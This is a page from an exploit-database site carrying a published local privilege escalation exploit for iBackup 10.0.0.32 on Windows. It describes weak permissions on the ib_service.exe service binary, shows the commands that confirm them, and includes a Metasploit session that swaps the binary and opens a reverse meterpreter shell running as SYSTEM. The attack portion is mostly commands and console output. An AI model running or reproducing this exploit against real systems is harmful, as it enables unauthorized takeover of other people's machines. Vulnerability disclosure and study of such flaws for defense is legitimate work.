0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

iBackup 10.0.0.32 - Local Privilege Escalation Vulnerability

Author

Glafkos Charalambous

Risk

[

Security Risk High

]

0day-ID

Category

Date add

CVE

Platform

# Exploit Title: iBackup <= 10.0.0.32 Local Privilege Escalation
# Date: 23/01/2014
# Author: Glafkos Charalambous <glafkos.charalambous[at]unithreat.com>
# Version: 10.0.0.32
# Vendor: IBackup
# Vendor URL: https://www.ibackup.com/
# CVE-2014-5507
 
 
Vulnerability Details
There are weak permissions for IBackupWindows default installation where everyone is allowed to change
the ib_service.exe with an executable of their choice. When the service restarts or the system reboots
the attacker payload will execute on the system with SYSTEM privileges.
 
 
C:\Users\0x414141>icacls "C:\Program Files\IBackupWindows\ib_service.exe"
C:\Program Files\IBackupWindows\ib_service.exe Everyone:(I)(F)
                                               NT AUTHORITY\SYSTEM:(I)(F)
                                               BUILTIN\Administrators:(I)(F)
                                               BUILTIN\Users:(I)(RX)
 
Successfully processed 1 files; Failed processing 0 files
 
 
C:\Users\0x414141>sc qc IBService
[SC] QueryServiceConfig SUCCESS
 
SERVICE_NAME: IBService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\IBackupWindows\ib_service.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : IBackup Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
 
 
 
msf exploit(service_permissions) > sessions
 
Active sessions
===============
 
  Id  Type                   Information                    Connection
  --  ----                   -----------                    ----------
  1   meterpreter x86/win32  0x414141-PC\0x414141 @ 0x414141-PC  192.168.0.100:8443 -> 192.168.0.102:1158 (192.168.0.102)
 
 
 
msf exploit(service_permissions) > show options
 
Module options (exploit/windows/local/service_permissions):
 
   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   AGGRESSIVE  true             no        Exploit as many services as possible (dangerous)
   SESSION     1                yes       The session to run this module on.
 
 
Payload options (windows/meterpreter/reverse_tcp):
 
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (accepted: seh, thread, process, none)
   LHOST     192.168.0.100    yes       The listen address
   LPORT     4444             yes       The listen port
 
 
Exploit target:
 
   Id  Name
   --  ----
   0   Automatic
 
 
msf exploit(service_permissions) > exploit
 
[*] Started reverse handler on 192.168.0.100:4444
[*] Meterpreter stager executable 15872 bytes long being uploaded..
[*] Trying to add a new service...
[*] No privs to create a service...
[*] Trying to find weak permissions in existing services..
[*] IBService has weak file permissions - C:\Program Files\IBackupWindows\ib_service.exe moved to C:\Program Files\IBackupWindows\ib_service.exe.bak and replaced.
[*] Restarting IBService
[*] Could not restart IBService. Wait for a reboot. (or force one yourself)
 
Upon Reboot or Service Restart
 
[*] Sending stage (770048 bytes) to 192.168.0.102
[*] Meterpreter session 2 opened (192.168.0.100:4444 -> 192.168.0.102:14852) at 2014-07-21 00:52:36 +0300
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > background
[*] Backgrounding session 2...
 
msf exploit(service_permissions) > sessions -l
 
Active sessions
===============
 
  Id  Type                   Information                       Connection
  --  ----                   -----------                       ----------
  1   meterpreter x86/win32  0x414141-PC\0x414141 @ 0x414141-PC  192.168.0.100:8443 -> 192.168.0.102:1158 (192.168.0.102)
  2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ 0x414141-PC  192.168.0.100:4444 -> 192.168.0.102:14852 (192.168.0.102)

#  0day.today [2024-11-16]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

iBackup 10.0.0.32 - Local Privilege Escalation Vulnerability

Report Error

Report Error